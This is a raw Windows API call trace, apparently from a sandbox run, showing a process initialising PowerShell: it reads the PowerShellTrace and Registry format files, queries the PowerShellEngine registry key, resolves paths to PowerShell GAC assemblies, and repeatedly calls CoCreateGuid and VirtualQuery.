	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x6867c1ab, Data2=0xf3a3, Data3=0x45ac, Data4=([0]=0x94, [1]=0xe3, [2]=0x26, [3]=0x5, [4]=0xb6, [5]=0x2b, [6]=0xad, [7]=0x5f))) returned 0x0
	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x5ef495b4, Data2=0x608b, Data3=0x494d, Data4=([0]=0xab, [1]=0x83, [2]=0x76, [3]=0x67, [4]=0xbc, [5]=0xff, [6]=0x2e, [7]=0xb2))) returned 0x0
	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x272b3d30, Data2=0xff5f, Data3=0x4e75, Data4=([0]=0xae, [1]=0xd4, [2]=0xcd, [3]=0x9f, [4]=0xc9, [5]=0x1b, [6]=0x75, [7]=0x4))) returned 0x0
	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x1e8f5222, Data2=0x90b, Data3=0x437d, Data4=([0]=0xa8, [1]=0x55, [2]=0xb1, [3]=0x9b, [4]=0x72, [5]=0x6d, [6]=0xaf, [7]=0xb1))) returned 0x0
	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x18eca30b, Data2=0x4f2e, Data3=0x483f, Data4=([0]=0xa3, [1]=0xe0, [2]=0xf3, [3]=0xaa, [4]=0x20, [5]=0x54, [6]=0xeb, [7]=0x48))) returned 0x0
	[0287.235] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe1f9c826, Data2=0xf84f, Data3=0x4df2, Data4=([0]=0xa5, [1]=0x1e, [2]=0xf8, [3]=0x15, [4]=0x1f, [5]=0xcb, [6]=0xed, [7]=0x28))) returned 0x0
	[0287.236] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xfc653151, Data2=0x7a58, Data3=0x4a0d, Data4=([0]=0x9b, [1]=0x73, [2]=0x23, [3]=0x49, [4]=0xda, [5]=0x95, [6]=0x8c, [7]=0x2))) returned 0x0
	[0287.236] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x72a1ac58, Data2=0x8e4f, Data3=0x49ff, Data4=([0]=0xa2, [1]=0x4a, [2]=0x97, [3]=0x63, [4]=0xb8, [5]=0xcf, [6]=0xf8, [7]=0xd3))) returned 0x0
	[0287.236] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xce601f72, Data2=0x116e, Data3=0x4a86, Data4=([0]=0xa6, [1]=0x1a, [2]=0x2, [3]=0x39, [4]=0x1d, [5]=0xdd, [6]=0xd3, [7]=0x73))) returned 0x0
	[0287.236] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.236] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x14fba400, Data2=0x543b, Data3=0x4c63, Data4=([0]=0x83, [1]=0xd4, [2]=0xa, [3]=0x33, [4]=0xe4, [5]=0xc8, [6]=0x33, [7]=0xc4))) returned 0x0
	[0287.237] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.237] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.238] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xa7b473db, Data2=0x7b18, Data3=0x4c5e, Data4=([0]=0x8f, [1]=0xe9, [2]=0x30, [3]=0x32, [4]=0x86, [5]=0x66, [6]=0xbe, [7]=0x39))) returned 0x0
	[0287.239] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.239] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xf2ebf30e, Data2=0x629b, Data3=0x488d, Data4=([0]=0xa6, [1]=0x57, [2]=0x7c, [3]=0x3d, [4]=0x51, [5]=0x82, [6]=0xe9, [7]=0x51))) returned 0x0
	[0287.239] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xaf56edb9, Data2=0x346c, Data3=0x4dfc, Data4=([0]=0x8a, [1]=0xbe, [2]=0x48, [3]=0xea, [4]=0xea, [5]=0x1e, [6]=0x99, [7]=0xf5))) returned 0x0
	[0287.239] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xa0a39bf6, Data2=0x2aef, Data3=0x41e2, Data4=([0]=0x8d, [1]=0xb4, [2]=0x5c, [3]=0x5c, [4]=0xcc, [5]=0xf1, [6]=0xb5, [7]=0xe9))) returned 0x0
	[0287.239] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x6d7fc946, Data2=0x8d8c, Data3=0x45c3, Data4=([0]=0x9f, [1]=0x5e, [2]=0x17, [3]=0xe4, [4]=0x6d, [5]=0x94, [6]=0x75, [7]=0x7f))) returned 0x0
	[0287.239] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x917e082a, Data2=0x7a07, Data3=0x41ad, Data4=([0]=0xa1, [1]=0x23, [2]=0xe9, [3]=0xc1, [4]=0xb7, [5]=0x3a, [6]=0xe4, [7]=0x74))) returned 0x0
	[0287.240] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x13dab889, Data2=0xec01, Data3=0x40b8, Data4=([0]=0xa8, [1]=0xfe, [2]=0x81, [3]=0xa8, [4]=0x80, [5]=0x4f, [6]=0x9, [7]=0x3e))) returned 0x0
	[0287.240] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xed812150, Data2=0x5f7d, Data3=0x4363, Data4=([0]=0xa7, [1]=0x85, [2]=0x5b, [3]=0xdd, [4]=0xf5, [5]=0xca, [6]=0xaf, [7]=0x3e))) returned 0x0
	[0287.240] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.240] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x772f70d5, Data2=0xc562, Data3=0x4605, Data4=([0]=0x91, [1]=0xc6, [2]=0x2e, [3]=0x40, [4]=0xf2, [5]=0xf5, [6]=0xf8, [7]=0xd7))) returned 0x0
	[0287.240] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x3750bcf, Data2=0x6620, Data3=0x4c5a, Data4=([0]=0x88, [1]=0xc7, [2]=0x1a, [3]=0xb2, [4]=0x55, [5]=0x6e, [6]=0xac, [7]=0x29))) returned 0x0
	[0287.241] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x90fafbb8, Data2=0xfe1d, Data3=0x4273, Data4=([0]=0x83, [1]=0xb1, [2]=0xc7, [3]=0x97, [4]=0xe5, [5]=0xab, [6]=0xec, [7]=0x34))) returned 0x0
	[0287.241] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xc2099ed5, Data2=0xe3fa, Data3=0x4465, Data4=([0]=0xa0, [1]=0xb, [2]=0x19, [3]=0xd1, [4]=0x1c, [5]=0x4a, [6]=0xa1, [7]=0xcf))) returned 0x0
	[0287.241] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xdbbf2818, Data2=0x77f5, Data3=0x4633, Data4=([0]=0xb7, [1]=0x87, [2]=0x34, [3]=0x2b, [4]=0x81, [5]=0x20, [6]=0x54, [7]=0xfd))) returned 0x0
	[0287.241] VirtualQuery (in: lpAddress=0xcc000, lpBuffer=0xccec0, dwLength=0x30 | out: lpBuffer=0xccec0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.241] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x87649e78, Data2=0xd95d, Data3=0x4f07, Data4=([0]=0x8f, [1]=0x86, [2]=0x4d, [3]=0xd1, [4]=0x6f, [5]=0xd5, [6]=0x54, [7]=0x10))) returned 0x0
	[0287.241] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x4083dbda, Data2=0xe99f, Data3=0x4c97, Data4=([0]=0x8e, [1]=0x32, [2]=0x7d, [3]=0xfa, [4]=0x1, [5]=0xc7, [6]=0xd9, [7]=0xbb))) returned 0x0
	[0287.242] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.242] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.242] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.242] VirtualQuery (in: lpAddress=0xcc070, lpBuffer=0xccf30, dwLength=0x30 | out: lpBuffer=0xccf30*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0287.242] SetErrorMode (uMode=0x1) returned 0x1
	[0287.242] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0287.243] GetFileType (hFile=0x304) returned 0x1
	[0287.243] SetErrorMode (uMode=0x1) returned 0x1
	[0287.243] GetFileType (hFile=0x304) returned 0x1
	[0287.243] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.243] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.243] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.243] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.243] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x8b4, lpOverlapped=0x0) returned 1
	[0287.244] ReadFile (in: hFile=0x304, lpBuffer=0x3147ee4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3147ee4*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0287.244] ReadFile (in: hFile=0x304, lpBuffer=0x3148ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3148ac8*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0287.244] CloseHandle (hObject=0x304) returned 1
	[0287.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0287.244] SetErrorMode (uMode=0x1) returned 0x1
	[0287.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0287.244] SetErrorMode (uMode=0x1) returned 0x1
	[0287.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0287.244] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x304) returned 0x0
	[0287.245] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0287.245] CoTaskMemAlloc (cb=0x5a) returned 0x1b835740
	[0287.245] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b835740, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0287.245] CoTaskMemFree (pv=0x1b835740) 
	[0287.245] RegCloseKey (hKey=0x304) returned 0x0
	[0287.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0287.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0287.245] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe57d604, Data2=0x5497, Data3=0x48e9, Data4=([0]=0xab, [1]=0xa4, [2]=0xb8, [3]=0x8, [4]=0xad, [5]=0xed, [6]=0xd4, [7]=0x66))) returned 0x0
	[0287.246] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x1f3b34ae, Data2=0x3e1e, Data3=0x47f6, Data4=([0]=0x8e, [1]=0xc2, [2]=0xcd, [3]=0x28, [4]=0x29, [5]=0xef, [6]=0x28, [7]=0x7))) returned 0x0
	[0287.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0287.246] SetErrorMode (uMode=0x1) returned 0x1
	[0287.247] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0287.247] GetFileType (hFile=0x304) returned 0x1
	[0287.247] SetErrorMode (uMode=0x1) returned 0x1
	[0287.247] GetFileType (hFile=0x304) returned 0x1
	[0287.247] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.247] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.247] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.247] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0287.247] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0xe98, lpOverlapped=0x0) returned 1
	[0287.248] ReadFile (in: hFile=0x304, lpBuffer=0x3185eb0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x3185eb0*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0287.248] ReadFile (in: hFile=0x304, lpBuffer=0x31868b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x31868b0*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0287.248] CloseHandle (hObject=0x304) returned 1
	[0287.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0287.248] SetErrorMode (uMode=0x1) returned 0x1
	[0287.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0287.248] SetErrorMode (uMode=0x1) returned 0x1
	[0287.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0287.249] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x304) returned 0x0
	[0287.249] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0287.249] CoTaskMemAlloc (cb=0x5a) returned 0x1b835740
	[0287.249] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1b835740, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0287.249] CoTaskMemFree (pv=0x1b835740) 
	[0287.249] RegCloseKey (hKey=0x304) returned 0x0
	[0287.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0287.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0287.249] VirtualQuery (in: lpAddress=0xcbec0, lpBuffer=0xccd80, dwLength=0x30 | out: lpBuffer=0xccd80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.250] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xe6638520, Data2=0x3a19, Data3=0x4ab5, Data4=([0]=0xbc, [1]=0x95, [2]=0xb7, [3]=0xcd, [4]=0xfc, [5]=0x42, [6]=0xf3, [7]=0x14))) returned 0x0
	[0287.250] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x2ef17679, Data2=0xb76b, Data3=0x40bd, Data4=([0]=0xa7, [1]=0x67, [2]=0x60, [3]=0x41, [4]=0xc4, [5]=0x74, [6]=0x8e, [7]=0x8c))) returned 0x0
	[0287.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0287.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0287.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
